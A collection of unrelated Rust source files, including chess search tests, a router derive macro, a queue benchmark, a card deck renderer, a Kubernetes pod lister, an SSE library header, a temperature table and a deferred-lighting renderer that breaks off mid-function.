        let mut p = pos("8/8/8/8/6k1/6P1/8/5bK1 b - - 0 1");
        assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) > 225 - d);

        let mut p = pos("8/8/8/8/5pkp/6P1/5P1P/6K1 b - - 0 1");
        assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);

        let mut p = pos("8/8/8/8/5pkp/6P1/5PKP/8 b - - 0 1");
        assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) <= -100 + d);

        let mut p = pos("r1bqkbnr/pppp2pp/2n2p2/4p3/2N1P2B/3P1N2/PPP2PPP/R2QKB1R w - - 5 1");
        assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);

        let mut p = pos("r1bqkbnr/pppp2pp/2n2p2/4N3/4P2B/3P1N2/PPP2PPP/R2QKB1R b - - 5 1");
        assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) <= -100 + d);

        let mut p = pos("rn2kbnr/ppppqppp/8/4p3/2N1P1b1/3P1N2/PPP2PPP/R1BKQB1R w - - 5 1");
        assert!(qsearch(&mut p, -1000, 1000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0).abs() <= d);

        let mut p = pos("8/8/8/8/8/7k/7q/7K w - - 0 1");
        assert!(qsearch(&mut p, -10000, 10000, VALUE_UNKNOWN, 0, 0, &mut s, &mut 0) <= -10000);
    }
}
|
use proc_macro::TokenStream;
use quote::quote;
use syn;
use syn::parse_macro_input;
use syn::{Data, DeriveInput, Field, Fields, Ident};
/// Generates a `::yew_router::matcher::FromCaptures` implementation for
/// the struct the derive macro was applied to.
///
/// The generated `from_captures` looks each named field up in the
/// captures map and parses the captured string into the field's type;
/// the generated `verify` panics when an expected key is absent from
/// the capture set.
///
/// Panics (at macro-expansion time) when applied to tuple structs,
/// unit structs, enums, or unions.
pub fn from_captures_impl(input: TokenStream) -> TokenStream {
    let input = parse_macro_input!(input as DeriveInput);
    let name = input.ident;
    // Only structs with named fields are supported.
    let fields: Vec<Field> = match input.data {
        Data::Struct(ds) => {
            match ds.fields {
                Fields::Named(fields_named) => {
                    fields_named.named.iter().cloned().collect::<Vec<_>>()
                }
                Fields::Unnamed(_) => {
                    panic!("Deriving FromCaptures not supported for Tuple Structs.")
                }
                Fields::Unit => {
                    panic!("Deriving FromCaptures not supported for Unit Structs, but it should be in the near future. Open an issue .")
                }
            }
        }
        Data::Enum(_de) => {
            panic!("Deriving FromCaptures not supported for Enums.")
        }
        Data::Union(_du) => {
            panic!("Deriving FromCaptures not supported for Unions.")
        }
    };
    // Field names rendered as strings -- the keys looked up in the
    // captures map.
    let keys = fields
        .iter()
        .cloned()
        .map(|f: Field| f.ident.unwrap())
        .map(|i: Ident| i.to_string())
        .collect::<Vec<_>>();
    // Two identifier iterators are needed because `quote!` repetition
    // consumes the interpolated iterator: one drives the `let`
    // bindings, the clone drives the struct literal.
    let idents = fields.iter().cloned().map(|f: Field| f.ident.unwrap());
    let idents2 = idents.clone();
    let types = fields.iter().cloned().map(|f| f.ty);
    // Per field: fetch the capture; on a missing key fall back to the
    // type's `key_not_available()` (yielding `MissingField` when there
    // is no fallback); otherwise parse the captured string, yielding
    // `FailedParse` on failure.
    let assignments = quote! {
        #(
        let #idents = captures
            .get(#keys)
            .map_or_else(
                || {
                    <#types as ::yew_router::matcher::FromCapturedKeyValue>::key_not_available()
                        .ok_or_else(|| {
                            ::yew_router::matcher::FromCapturesError::MissingField {
                                field_name: #keys.to_string()
                            }
                        })
                },
                |m: &String| {
                    let x: Result<#types, ::yew_router::matcher::FromCapturesError> = ::yew_router::matcher::FromCapturedKeyValue::from_value(m.as_str())
                        .ok_or_else(|| {
                            ::yew_router::matcher::FromCapturesError::FailedParse {
                                field_name: #keys.to_string(),
                                source_string: m.clone()
                            }
                        });
                    x
                }
            )?;
        )*
    };
    // Assemble the trait impl from the per-field bindings above.
    let expanded = quote! {
        impl ::yew_router::matcher::FromCaptures for #name {
            fn from_captures(captures: &::yew_router::matcher::Captures) -> Result<Self, ::yew_router::matcher::FromCapturesError> {
                #assignments
                let x = #name {
                    #(#idents2),*
                };
                Ok(x)
            }
            fn verify(captures: &::std::collections::HashSet<String>) {
                #(
                if !captures.contains(&#keys.to_string()) {
                    panic!("The struct expected the matches to contain a field named '{}'", #keys.to_string())
                }
                )*
            }
        }
    };
    TokenStream::from(expanded)
}
|
extern crate crossbeam;
extern crate pipeline;
extern crate time;
use pipeline::queue::multiqueue::{MultiReader, MultiWriter, multiqueue};
use time::precise_time_ns;
use crossbeam::scope;
use std::sync::atomic::{AtomicUsize, Ordering, fence};
use std::sync::Barrier;
fn recv(bar: &Barrier, reader: MultiReader<Option<u64>>) -> u64 {
bar.wait();
let start = precise_time_ns();
let mut cur = 0;
loop {
if let Some(popped) = reader.pop() {
match popped {
None => break,
Some(pushed) => {
if (cur != pushed) {
panic!("Dang");
}
cur += 1;
}
}
}
}
precise_time_ns() - start
}
/// Pushes `Some(0)..Some(num_push-1)` into the queue, followed by a
/// `None` end-of-stream sentinel.
///
/// Waits on `bar` first so both threads start timing together.
/// (The non-snake-case name is kept because `main` calls it by this
/// name; the lint is silenced instead.)
#[allow(non_snake_case)]
fn Send(bar: &Barrier, writer: MultiWriter<Option<u64>>, num_push: usize) {
    bar.wait();
    for i in 0..num_push as u64 {
        // Spin until the bounded queue has room for the next value.
        while writer.push(Some(i)).is_err() {}
    }
    // BUG FIX: the sentinel push could fail when the queue was full,
    // and its result was silently discarded -- `recv` would then spin
    // forever waiting for `None`. Retry it like the data pushes.
    while writer.push(None).is_err() {}
}
fn main() {
let num_do = 100000;
let (writer, reader) = multiqueue(20000);
let bar = Barrier::new(2);
let bref = &bar;
scope(|scope| {
scope.spawn(move || {
Send(bref, writer, num_do);
});
let ns_spent = recv(bref, reader) as f64;
let ns_per_item = ns_spent / (num_do as f64);
println!("Time spent doing {} push/pop pairs (without waiting on the popped result!) was {} ns per item", num_do, ns_per_item);
});
} |
use rand::Rng;
// Default 4-suit deck cards. Each suited variant carries the card's
// numeric value (1-13, ace through king).
#[derive(Serialize, Deserialize, Debug)]
pub enum Card {
    Heart(i32),   // Hertta (Finnish for heart)
    Spade(i32),   // Pata (Finnish for spade)
    Diamond(i32), // Ruutu (Finnish for diamond)
    Club(i32),    // Risti (Finnish for club)
    Hidden,       // Hidden or back side of a card
}
impl Card {
    /// Renders one row (0-4) of the card's five-line text-art
    /// representation. Rows outside `0..=4` yield an empty string.
    pub fn get_line(&self, line: usize) -> String {
        let suit = self.get_suit();
        let value = get_value_for_card(self.get_value());
        let bg = self.get_background();
        match line {
            // Top border.
            0 => String::from("┌─────┐"),
            // Suit mark in the top-left corner.
            // (Cleaned up: `format!` already returns a `String`, so the
            // old `String::from(format!(...))` wrapper was redundant.)
            1 => format!("│{}{}{}{}{}│", suit, bg, bg, bg, bg),
            // Two-character value on the middle row.
            2 => format!("│{}{}{}{}│", bg, bg, value, bg),
            // Suit mark in the bottom-right corner.
            3 => format!("│{}{}{}{}{}│", bg, bg, bg, bg, suit),
            // Bottom border.
            4 => String::from("└─────┘"),
            _ => String::new()
        }
    }

    /// Returns the card's numeric value (1-13), or 0 for `Hidden`.
    fn get_value(&self) -> i32 {
        use self::Card::*;
        match self {
            Heart(v) | Diamond(v) | Spade(v) | Club(v) => *v,
            Hidden => 0,
        }
    }

    /// Returns the Unicode symbol for the card's suit.
    fn get_suit(&self) -> char {
        use self::Card::*;
        match self {
            Heart(_) => '♥',
            Diamond(_) => '♦',
            // BUG FIX: spade (Pata) and club (Risti) symbols were
            // swapped -- Spade rendered '♣' and Club rendered '♠',
            // contradicting the enum's own suit comments.
            Spade(_) => '♠',
            Club(_) => '♣',
            Hidden => '░',
        }
    }

    /// Background fill character: shaded for `Hidden`, space otherwise.
    fn get_background(&self) -> char {
        match self {
            Card::Hidden => '░',
            _ => ' '
        }
    }

    /// Draws a uniformly random card: value 1-13, one of the four suits.
    pub fn random<R: Rng + ?Sized>(rng: &mut R) -> Card
    {
        use self::Card::*;
        let value = rng.gen_range(1, 14);
        let suit = rng.gen_range(0, 4);
        match suit {
            0 => Heart(value),
            1 => Diamond(value),
            2 => Spade(value),
            3 => Club(value),
            // Unreachable: `gen_range(0, 4)` yields 0..=3; kept as a
            // defensive default.
            _ => Hidden
        }
    }
}
#[derive(Serialize, Deserialize, Debug)]
pub struct Deck {
    // Cards in draw order; the top of the deck is the END of the vector
    // (`Deck::draw` pops from the back).
    pub cards: Vec<Card>
}
impl Deck {
    /// Builds a full 52-card deck: values 1-13 in each of the four
    /// suits, interleaved per value.
    pub fn new() -> Deck {
        let mut cards = Vec::with_capacity(52);
        for value in 1..=13 {
            cards.push(Card::Heart(value));
            cards.push(Card::Spade(value));
            cards.push(Card::Diamond(value));
            cards.push(Card::Club(value));
        }
        Deck { cards }
    }

    /// Builds a deck containing no cards.
    pub fn empty() -> Deck {
        Deck { cards: Vec::new() }
    }

    /// Places `card` on top of the deck.
    pub fn insert(&mut self, card: Card) {
        self.cards.push(card);
    }

    /// Removes and returns the top card, or `Card::Hidden` when the
    /// deck is empty.
    pub fn draw(&mut self) -> Card {
        self.cards.pop().unwrap_or(Card::Hidden)
    }

    /// Randomizes the order of the cards using `rng`.
    pub fn shuffle<R: Rng + ?Sized>(&mut self, rng: &mut R) {
        rng.shuffle(&mut self.cards[..]);
    }

    /// Prints the whole deck as text art.
    pub fn print(&self) {
        print_deck(&self.cards[..]);
    }
}
/// Prints the given cards side by side as five rows of text art.
pub fn print_deck(cards: &[Card]) {
    for line in 0..5 {
        // Iterate the slice directly instead of indexing (avoids the
        // bounds-checked `cards[c]` access and the manual index loop).
        for card in cards {
            print!("{}", card.get_line(line));
        }
        // Fixed: `println!("")` -> `println!()` (idiomatic; the empty
        // string literal triggers the `println_empty_string` lint).
        println!();
    }
}
/// Maps a card value (1-13) to its fixed-width two-character label
/// ("1 ".."10", "J ", "Q ", "K "). Out-of-range values produce the
/// placeholder "?░".
fn get_value_for_card(value: i32) -> &'static str {
    const LABELS: [&'static str; 13] = [
        "1 ", "2 ", "3 ", "4 ", "5 ", "6 ", "7 ", "8 ", "9 ", "10", "J ", "Q ", "K ",
    ];
    if value >= 1 && value <= 13 {
        LABELS[(value - 1) as usize]
    } else {
        "?░"
    }
}
|
use k8s_openapi::api::core::v1::Pod;
use kube::{
api::{Api, ListParams},
Client,
};
use tracing::*;
/// Lists pods and filters the resulting object list through a JSONPath
/// expression taken from the `JSONPATH` env var (defaulting to the
/// container images), optionally narrowed by `FIELD_SELECTOR`.
#[tokio::main]
async fn main() -> anyhow::Result<()> {
    tracing_subscriber::fmt::init();
    let client = Client::try_default().await?;
    // Equivalent to `kubectl get pods --all-namespace \
    //   -o jsonpath='{.items[*].spec.containers[*].image}'`
    let field_selector = std::env::var("FIELD_SELECTOR").unwrap_or_default();
    let jsonpath = format!(
        "{}{}",
        "$",
        std::env::var("JSONPATH").unwrap_or_else(|_| ".items[*].spec.containers[*].image".into())
    );
    let pods: Api<Pod> = Api::<Pod>::all(client);
    let list_params = ListParams::default().fields(&field_selector);
    let list = pods.list(&list_params).await?;
    // Use the given JSONPATH to filter the ObjectList.
    let list_json = serde_json::to_value(&list)?;
    // BUG FIX: `JSONPATH` is user-controlled, so a malformed expression
    // used to panic via `unwrap`; report it as an error instead.
    let res = jsonpath_lib::select(&list_json, &jsonpath)
        .map_err(|e| anyhow::anyhow!("failed to apply JSONPath '{}': {:?}", jsonpath, e))?;
    info!("\t\t {:?}", res);
    Ok(())
}
|
//! Async Server Sent Event parser and encoder.
//!
//! # Example
//!
//! ```no_run
//! use tide::Request;
//!
//! #[async_std::main]
//! async fn main() -> http_types::Result<()> {
//! let mut app = tide::new();
//!
//! app.at("/sse").get(|req| async move {
//! let mut res = tide_compressed_sse::upgrade(req, |_req: Request<()>, sender| async move {
//! sender.send("message", "foo", None).await?;
//!
//! Ok(())
//! });
//!
//! Ok(res)
//! });
//!
//! app.listen("localhost:8080").await?;
//!
//! Ok(())
//! }
//! ```
//!
//! # References
//!
//! - [SSE Spec](https://html.spec.whatwg.org/multipage/server-sent-events.html#concept-event-stream-last-event-id)
//! - [EventSource web platform tests](https://github.com/web-platform-tests/wpt/tree/master/eventsource)
#![forbid(rust_2018_idioms)]
#![deny(missing_debug_implementations, nonstandard_style)]
#![warn(missing_docs, missing_doc_code_examples)]
mod decoder;
mod encoder;
mod event;
mod handshake;
mod lines;
mod message;
mod tide;
use encoder::encode;
use event::Event;
use message::Message;
pub use crate::tide::upgrade::upgrade;
pub use crate::tide::Sender;
/// Exports for tests
#[cfg(feature = "__internal_test")]
pub mod internals {
pub use crate::decoder::{decode, Decoder};
pub use crate::encoder::{encode, Encoder};
pub use crate::event::Event;
}
pub(crate) use lines::Lines;
|
/// Prints a Fahrenheit→Celsius table followed by a Celsius→Fahrenheit
/// table, each covering 0-100 in steps of 10.
fn main() {
    // Fahrenheit → Celsius.
    println!("===================");
    println!("| Fahr | Cels |");
    for fahr in (0..101).step_by(10) {
        println!("| {:5} | {:5.1} |",
                 fahr, fahr_cels(fahr));
    }
    println!("===================");

    // Celsius → Fahrenheit.
    println!("===================");
    println!("| Cels | Fahr |");
    for cels in (0..101).step_by(10) {
        println!("| {:5} | {:5.1} |",
                 cels, cels_fahr(cels));
    }
    println!("===================");
}
/// Converts a temperature from degrees Fahrenheit to degrees Celsius
/// using C = (F - 32) * 5/9.
fn fahr_cels(fahr: i32) -> f64 {
    // Idiom fix: the trailing `return` and throwaway bindings replaced
    // by a single tail expression (same float operations, same result).
    (fahr - 32) as f64 * (5_f64 / 9_f64)
}
/// Converts a temperature from degrees Celsius to degrees Fahrenheit
/// using F = C * 9/5 + 32.
fn cels_fahr(cels: i32) -> f64 {
    // Idiom fix: trailing `return` and intermediate bindings replaced
    // by a single tail expression (same float operations, same result).
    cels as f64 * (9_f64 / 5_f64) + 32_f64
}
|
use std::{
rc::Rc,
cell::RefCell,
};
use crate::{
renderer::{
flat_shader::FlatShader,
surface::SurfaceSharedData,
framework::{
gl,
gpu_texture::GpuTexture,
gpu_program::{
UniformLocation,
GpuProgram,
UniformValue,
},
framebuffer::{
DrawParameters,
CullFace,
FrameBufferTrait,
},
state::{
State,
ColorMask,
StencilFunc,
StencilOp,
},
},
gbuffer::GBuffer,
error::RendererError,
shadow_map_renderer::{
PointShadowMapRenderContext,
SpotShadowMapRenderer,
PointShadowMapRenderer,
},
QualitySettings,
RenderPassStatistics,
GeometryCache,
TextureCache,
ssao::ScreenSpaceAmbientOcclusionRenderer,
},
scene::{
camera::Camera,
Scene,
node::Node,
light::LightKind,
},
core::{
scope_profile,
math::{
vec3::Vec3,
mat4::Mat4,
frustum::Frustum,
Rect,
},
color::Color,
},
};
use crate::renderer::light_volume::LightVolumeRenderer;
// Shader for the ambient lighting pass
// (`shaders/ambient_light_fs.glsl` / `_vs.glsl`).
struct AmbientLightShader {
    program: GpuProgram,
    // Uniform locations, resolved once in `new` and cached here.
    wvp_matrix: UniformLocation,
    diffuse_texture: UniformLocation,
    ambient_color: UniformLocation,
    ao_sampler: UniformLocation,
}
impl AmbientLightShader {
    // Compiles the ambient-light GLSL program and resolves its uniform
    // locations, returning `RendererError` if compilation/linking fails
    // or a uniform lookup fails.
    fn new() -> Result<Self, RendererError> {
        let fragment_source = include_str!("shaders/ambient_light_fs.glsl");
        let vertex_source = include_str!("shaders/ambient_light_vs.glsl");
        let program = GpuProgram::from_source("AmbientLightShader", vertex_source, fragment_source)?;
        Ok(Self {
            // The uniform lookups must run before `program` is moved into
            // the struct, which is why `program` is listed last (struct
            // literal fields are evaluated in written order).
            wvp_matrix: program.uniform_location("worldViewProjection")?,
            diffuse_texture: program.uniform_location("diffuseTexture")?,
            ambient_color: program.uniform_location("ambientColor")?,
            ao_sampler: program.uniform_location("aoSampler")?,
            program,
        })
    }
}
/// GPU program plus uniform locations for the deferred spot-light pass.
/// Field names mirror the GLSL uniform names resolved in [`SpotLightShader::new`].
struct SpotLightShader {
    program: GpuProgram,
    wvp_matrix: UniformLocation,
    depth_sampler: UniformLocation,
    color_sampler: UniformLocation,
    normal_sampler: UniformLocation,
    spot_shadow_texture: UniformLocation,
    light_view_proj_matrix: UniformLocation,
    shadows_enabled: UniformLocation,
    soft_shadows: UniformLocation,
    shadow_map_inv_size: UniformLocation,
    light_position: UniformLocation,
    light_radius: UniformLocation,
    light_color: UniformLocation,
    light_direction: UniformLocation,
    half_hotspot_cone_angle_cos: UniformLocation,
    half_cone_angle_cos: UniformLocation,
    inv_view_proj_matrix: UniformLocation,
    camera_position: UniformLocation,
}
impl SpotLightShader {
    /// Compiles the deferred spot-light GPU program and resolves every
    /// uniform location it needs, in the same order the struct declares them.
    fn new() -> Result<Self, RendererError> {
        let program = GpuProgram::from_source(
            "DeferredLightShader",
            include_str!("shaders/deferred_light_vs.glsl"),
            include_str!("shaders/deferred_spot_light_fs.glsl"),
        )?;
        let wvp_matrix = program.uniform_location("worldViewProjection")?;
        let depth_sampler = program.uniform_location("depthTexture")?;
        let color_sampler = program.uniform_location("colorTexture")?;
        let normal_sampler = program.uniform_location("normalTexture")?;
        let spot_shadow_texture = program.uniform_location("spotShadowTexture")?;
        let light_view_proj_matrix = program.uniform_location("lightViewProjMatrix")?;
        let shadows_enabled = program.uniform_location("shadowsEnabled")?;
        let soft_shadows = program.uniform_location("softShadows")?;
        let shadow_map_inv_size = program.uniform_location("shadowMapInvSize")?;
        let light_position = program.uniform_location("lightPos")?;
        let light_radius = program.uniform_location("lightRadius")?;
        let light_color = program.uniform_location("lightColor")?;
        let light_direction = program.uniform_location("lightDirection")?;
        let half_hotspot_cone_angle_cos = program.uniform_location("halfHotspotConeAngleCos")?;
        let half_cone_angle_cos = program.uniform_location("halfConeAngleCos")?;
        let inv_view_proj_matrix = program.uniform_location("invViewProj")?;
        let camera_position = program.uniform_location("cameraPosition")?;
        Ok(Self {
            program,
            wvp_matrix,
            depth_sampler,
            color_sampler,
            normal_sampler,
            spot_shadow_texture,
            light_view_proj_matrix,
            shadows_enabled,
            soft_shadows,
            shadow_map_inv_size,
            light_position,
            light_radius,
            light_color,
            light_direction,
            half_hotspot_cone_angle_cos,
            half_cone_angle_cos,
            inv_view_proj_matrix,
            camera_position,
        })
    }
}
/// GPU program plus uniform locations for the deferred point-light pass.
/// Field names mirror the GLSL uniform names resolved in [`PointLightShader::new`].
struct PointLightShader {
    program: GpuProgram,
    wvp_matrix: UniformLocation,
    depth_sampler: UniformLocation,
    color_sampler: UniformLocation,
    normal_sampler: UniformLocation,
    point_shadow_texture: UniformLocation,
    shadows_enabled: UniformLocation,
    soft_shadows: UniformLocation,
    light_position: UniformLocation,
    light_radius: UniformLocation,
    light_color: UniformLocation,
    inv_view_proj_matrix: UniformLocation,
    camera_position: UniformLocation,
}
impl PointLightShader {
    /// Compiles the deferred point-light GPU program and resolves every
    /// uniform location it needs, in the same order the struct declares them.
    fn new() -> Result<Self, RendererError> {
        let program = GpuProgram::from_source(
            "DeferredLightShader",
            include_str!("shaders/deferred_light_vs.glsl"),
            include_str!("shaders/deferred_point_light_fs.glsl"),
        )?;
        let wvp_matrix = program.uniform_location("worldViewProjection")?;
        let depth_sampler = program.uniform_location("depthTexture")?;
        let color_sampler = program.uniform_location("colorTexture")?;
        let normal_sampler = program.uniform_location("normalTexture")?;
        let point_shadow_texture = program.uniform_location("pointShadowTexture")?;
        let shadows_enabled = program.uniform_location("shadowsEnabled")?;
        let soft_shadows = program.uniform_location("softShadows")?;
        let light_position = program.uniform_location("lightPos")?;
        let light_radius = program.uniform_location("lightRadius")?;
        let light_color = program.uniform_location("lightColor")?;
        let inv_view_proj_matrix = program.uniform_location("invViewProj")?;
        let camera_position = program.uniform_location("cameraPosition")?;
        Ok(Self {
            program,
            wvp_matrix,
            depth_sampler,
            color_sampler,
            normal_sampler,
            point_shadow_texture,
            shadows_enabled,
            soft_shadows,
            light_position,
            light_radius,
            light_color,
            inv_view_proj_matrix,
            camera_position,
        })
    }
}
/// GPU program plus uniform locations for the deferred directional-light pass.
/// Field names mirror the GLSL uniform names resolved in [`DirectionalLightShader::new`].
struct DirectionalLightShader {
    program: GpuProgram,
    wvp_matrix: UniformLocation,
    depth_sampler: UniformLocation,
    color_sampler: UniformLocation,
    normal_sampler: UniformLocation,
    light_direction: UniformLocation,
    light_color: UniformLocation,
    inv_view_proj_matrix: UniformLocation,
    camera_position: UniformLocation,
}
impl DirectionalLightShader {
    /// Compiles the deferred directional-light GPU program and resolves every
    /// uniform location it needs, in the same order the struct declares them.
    fn new() -> Result<Self, RendererError> {
        let program = GpuProgram::from_source(
            "DeferredLightShader",
            include_str!("shaders/deferred_light_vs.glsl"),
            include_str!("shaders/deferred_directional_light_fs.glsl"),
        )?;
        let wvp_matrix = program.uniform_location("worldViewProjection")?;
        let depth_sampler = program.uniform_location("depthTexture")?;
        let color_sampler = program.uniform_location("colorTexture")?;
        let normal_sampler = program.uniform_location("normalTexture")?;
        let light_direction = program.uniform_location("lightDirection")?;
        let light_color = program.uniform_location("lightColor")?;
        let inv_view_proj_matrix = program.uniform_location("invViewProj")?;
        let camera_position = program.uniform_location("cameraPosition")?;
        Ok(Self {
            program,
            wvp_matrix,
            depth_sampler,
            color_sampler,
            normal_sampler,
            light_direction,
            light_color,
            inv_view_proj_matrix,
            camera_position,
        })
    }
}
/// Deferred-shading light pass renderer: owns the per-light-kind shaders,
/// the shared quad/sphere geometry and the shadow-map sub-renderers.
pub struct DeferredLightRenderer {
    pub ssao_renderer: ScreenSpaceAmbientOcclusionRenderer,
    spot_light_shader: SpotLightShader,
    point_light_shader: PointLightShader,
    directional_light_shader: DirectionalLightShader,
    ambient_light_shader: AmbientLightShader,
    /// Unit XY quad used for fullscreen (screen-space) passes.
    quad: SurfaceSharedData,
    /// Unit sphere used to stencil-mask each light's bounding volume.
    sphere: SurfaceSharedData,
    flat_shader: FlatShader,
    spot_shadow_map_renderer: SpotShadowMapRenderer,
    point_shadow_map_renderer: PointShadowMapRenderer,
    light_volume: LightVolumeRenderer,
}
/// Everything the deferred light pass needs to render one frame.
pub struct DeferredRendererContext<'a> {
    pub state: &'a mut State,
    pub scene: &'a Scene,
    pub camera: &'a Camera,
    pub gbuffer: &'a mut GBuffer,
    /// Fallback texture, bound where no real texture applies (e.g. when SSAO
    /// is disabled, or for shadow-map sub-renderers).
    pub white_dummy: Rc<RefCell<GpuTexture>>,
    pub ambient_color: Color,
    pub settings: &'a QualitySettings,
    pub textures: &'a mut TextureCache,
    pub geometry_cache: &'a mut GeometryCache,
}
impl DeferredLightRenderer {
    /// Creates the renderer together with all of its shaders, helper geometry
    /// (fullscreen quad and light-bounds sphere) and shadow-map sub-renderers.
    pub fn new(state: &mut State, frame_size: (u32, u32), settings: &QualitySettings) -> Result<Self, RendererError> {
        Ok(Self {
            ssao_renderer: ScreenSpaceAmbientOcclusionRenderer::new(state, frame_size.0 as usize, frame_size.1 as usize)?,
            spot_light_shader: SpotLightShader::new()?,
            point_light_shader: PointLightShader::new()?,
            directional_light_shader: DirectionalLightShader::new()?,
            ambient_light_shader: AmbientLightShader::new()?,
            quad: SurfaceSharedData::make_unit_xy_quad(),
            sphere: SurfaceSharedData::make_sphere(6, 6, 1.0),
            flat_shader: FlatShader::new()?,
            spot_shadow_map_renderer: SpotShadowMapRenderer::new(state, settings.spot_shadow_map_size)?,
            point_shadow_map_renderer: PointShadowMapRenderer::new(state, settings.point_shadow_map_size)?,
            light_volume: LightVolumeRenderer::new()?
        })
    }
    /// Applies new quality settings: re-creates a shadow-map renderer only if
    /// its size actually changed, and forwards the SSAO radius.
    pub fn set_quality_settings(&mut self, state: &mut State, settings: &QualitySettings) -> Result<(), RendererError> {
        if settings.spot_shadow_map_size != self.spot_shadow_map_renderer.size {
            self.spot_shadow_map_renderer = SpotShadowMapRenderer::new(state, settings.spot_shadow_map_size)?;
        }
        if settings.point_shadow_map_size != self.point_shadow_map_renderer.size {
            self.point_shadow_map_renderer = PointShadowMapRenderer::new(state, settings.point_shadow_map_size)?;
        }
        self.ssao_renderer.set_radius(settings.ssao_radius);
        Ok(())
    }
    /// Rebuilds the SSAO renderer for a new output resolution.
    pub fn set_frame_size(&mut self, state: &mut State, frame_size: (u32, u32)) -> Result<(), RendererError> {
        self.ssao_renderer = ScreenSpaceAmbientOcclusionRenderer::new(state, frame_size.0 as usize, frame_size.1 as usize)?;
        Ok(())
    }
    /// Runs the deferred lighting pass over the already-filled G-buffer:
    /// optional SSAO, a fullscreen ambient term, then one additively-blended,
    /// stencil-masked pass per visible light (rendering shadow maps first
    /// where enabled), plus optional light-scattering volumes.
    /// Returns accumulated draw statistics.
    #[must_use]
    pub fn render(&mut self, args: DeferredRendererContext) -> RenderPassStatistics {
        scope_profile!();
        let mut statistics = RenderPassStatistics::default();
        let DeferredRendererContext {
            state, scene, camera,
            gbuffer, white_dummy, ambient_color,
            settings, textures, geometry_cache
        } = args;
        let viewport = Rect::new(0, 0, gbuffer.width, gbuffer.height);
        let frustum = Frustum::from(camera.view_projection_matrix()).unwrap();
        // Maps the unit XY quad onto the whole viewport (used by fullscreen passes).
        let frame_matrix =
            Mat4::ortho(0.0, viewport.w as f32, viewport.h as f32, 0.0, -1.0, 1.0) *
            Mat4::scale(Vec3::new(viewport.w as f32, viewport.h as f32, 0.0));
        let projection_matrix = camera.projection_matrix();
        let view_projection = camera.view_projection_matrix();
        let inv_view_projection = view_projection.inverse().unwrap_or_default();
        // Fill SSAO map.
        if settings.use_ssao {
            statistics += self.ssao_renderer.render(
                state,
                gbuffer,
                geometry_cache,
                projection_matrix,
                camera.view_matrix().basis(),
            );
        }
        gbuffer.final_frame.clear(state, viewport, Some(Color::from_rgba(0, 0, 0, 0)), None, Some(0));
        // Ambient light.
        gbuffer.final_frame.draw(
            geometry_cache.get(state, &self.quad),
            state,
            viewport,
            &self.ambient_light_shader.program,
            DrawParameters {
                cull_face: CullFace::Back,
                culling: false,
                color_write: Default::default(),
                depth_write: false,
                stencil_test: false,
                depth_test: false,
                blend: false,
            },
            &[
                (self.ambient_light_shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
                (self.ambient_light_shader.ambient_color, UniformValue::Color(ambient_color)),
                (self.ambient_light_shader.diffuse_texture, UniformValue::Sampler {
                    index: 0,
                    texture: gbuffer.diffuse_texture(),
                }),
                (self.ambient_light_shader.ao_sampler, UniformValue::Sampler {
                    index: 1,
                    // Without SSAO a white texture stands in for "no occlusion".
                    texture: if settings.use_ssao {
                        self.ssao_renderer.ao_map()
                    } else {
                        white_dummy.clone()
                    },
                })
            ],
        );
        // Additive blending: each light accumulates on top of the ambient term.
        state.set_blend(true);
        state.set_blend_func(gl::ONE, gl::ONE);
        for light in scene.graph.linear_iter().filter_map(|node| {
            if let Node::Light(light) = node { Some(light) } else { None }
        }) {
            if !light.global_visibility() {
                continue;
            }
            let raw_radius = match light.kind() {
                LightKind::Spot(spot_light) => spot_light.distance(),
                LightKind::Point(point_light) => point_light.radius(),
                // Directional lights have no distance falloff.
                LightKind::Directional => { std::f32::MAX }
            };
            let light_position = light.global_position();
            let light_radius_scale = light.local_transform().scale().max_value();
            let light_radius = light_radius_scale * raw_radius;
            // Slightly inflate the bounding sphere so the stencil volume fully
            // covers the light's influence.
            let light_r_inflate = 1.05 * light_radius;
            let light_radius_vec = Vec3::new(light_r_inflate, light_r_inflate, light_r_inflate);
            let emit_direction = light.up_vector().normalized().unwrap_or(Vec3::LOOK);
            // Frustum culling: skip lights that cannot affect visible pixels.
            if !frustum.is_intersects_sphere(light_position, light_radius) {
                continue;
            }
            let distance_to_camera = (light.global_position() - camera.global_position()).len();
            let mut light_view_projection = Mat4::IDENTITY;
            // Render the light's shadow map (if enabled and close enough);
            // `shadows_enabled` is later passed to the lighting shader.
            let shadows_enabled = light.is_cast_shadows() && match light.kind() {
                LightKind::Spot(spot) if distance_to_camera <= settings.spot_shadows_distance && settings.spot_shadows_enabled => {
                    let light_projection_matrix = Mat4::perspective(
                        spot.full_cone_angle(),
                        1.0,
                        0.01,
                        light_radius,
                    );
                    let light_look_at = light_position - emit_direction;
                    let light_up_vec = light.look_vector().normalized().unwrap_or(Vec3::UP);
                    let light_view_matrix = Mat4::look_at(light_position, light_look_at, light_up_vec)
                        .unwrap_or_default();
                    light_view_projection = light_projection_matrix * light_view_matrix;
                    statistics += self.spot_shadow_map_renderer.render(
                        state,
                        &scene.graph,
                        &light_view_projection,
                        white_dummy.clone(),
                        textures,
                        geometry_cache,
                    );
                    true
                }
                LightKind::Point(_) if distance_to_camera <= settings.point_shadows_distance && settings.point_shadows_enabled => {
                    statistics += self.point_shadow_map_renderer.render(
                        PointShadowMapRenderContext {
                            state,
                            graph: &scene.graph,
                            white_dummy: white_dummy.clone(),
                            light_pos: light_position,
                            light_radius,
                            texture_cache: textures,
                            geom_cache: geometry_cache,
                        }
                    );
                    true
                }
                LightKind::Directional => {
                    // TODO: Add cascaded shadow map.
                    false
                }
                _ => false
            };
            // Mark lighted areas in stencil buffer to do light calculations only on them.
            state.set_stencil_mask(0xFFFF_FFFF);
            state.set_stencil_func(StencilFunc { func: gl::ALWAYS, ..Default::default() });
            state.set_stencil_op(StencilOp { zfail: gl::INCR, ..Default::default() });
            let sphere = geometry_cache.get(state, &self.sphere);
            // First stencil pass: front-culled sphere, increment on depth fail.
            statistics += gbuffer.final_frame.draw(
                sphere,
                state,
                viewport,
                &self.flat_shader.program,
                DrawParameters {
                    cull_face: CullFace::Front,
